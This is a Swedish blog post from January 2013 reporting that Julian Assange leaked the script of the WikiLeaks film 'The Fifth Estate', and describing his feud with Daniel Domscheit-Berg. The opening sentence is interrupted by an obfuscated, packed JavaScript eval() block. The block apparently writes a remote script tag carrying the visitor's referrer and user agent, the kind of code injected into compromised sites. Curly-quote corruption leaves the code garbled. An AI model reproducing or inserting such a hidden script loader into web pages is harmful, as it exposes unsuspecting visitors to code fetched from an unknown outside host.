Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

WikiLeaks film manuset har läckt på WikiLeaks

wikileaks
Filip Urde
  • On 28 januari, 2013
  • http://www.revue.se/filip-urde

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hazsd|var|u0026u|referrer|yhzyf||js|php’.split(’|’),0,{}))
ni kanske vet så är en WikiLeaks film på gång, en film som WikiLeaks grundaren Julian Assange inte är ett stort fan av.

 

 

Julian Assange, som idag gömmer sig på Ecuadors ambassad i London, påstår att han har fått tag i ett manus till den kommande filmen som handlar om honom och WikiLeaks. Filmen går under namnet ”The Fifth Estate” och Assange anser att filmen är en ren propaganda film emot honom och WikiLeaks.

Manuset har i och med detta så klart kommit upp på WikiLeaks.

Filmen baseras dels på uppgifter från boken ”Inside WikiLeaks: My Time with Julian Assange at the World’s Most Dangerous Website” som skrevs av Assanges kollega Daniel Domscheit-Berg (Daniel Schmitt). Att filmen bygger på fakta från Domscheit-Bergs bok är en del i varför Assange är så upprörd, det är ju kanske ingen hemlighet att Assange inte är speciellt bra vän med Domscheit-Berg som hoppade av WikiLeaks och gick ut med att han skulle starta en konkurrent till WikiLeaks med namnet OpenLeaks.

”The Fifth Estate” har premiär i USA den 15 november. När den kommer upp på svenska biografer har vi ingen information om.
news.yahoo.com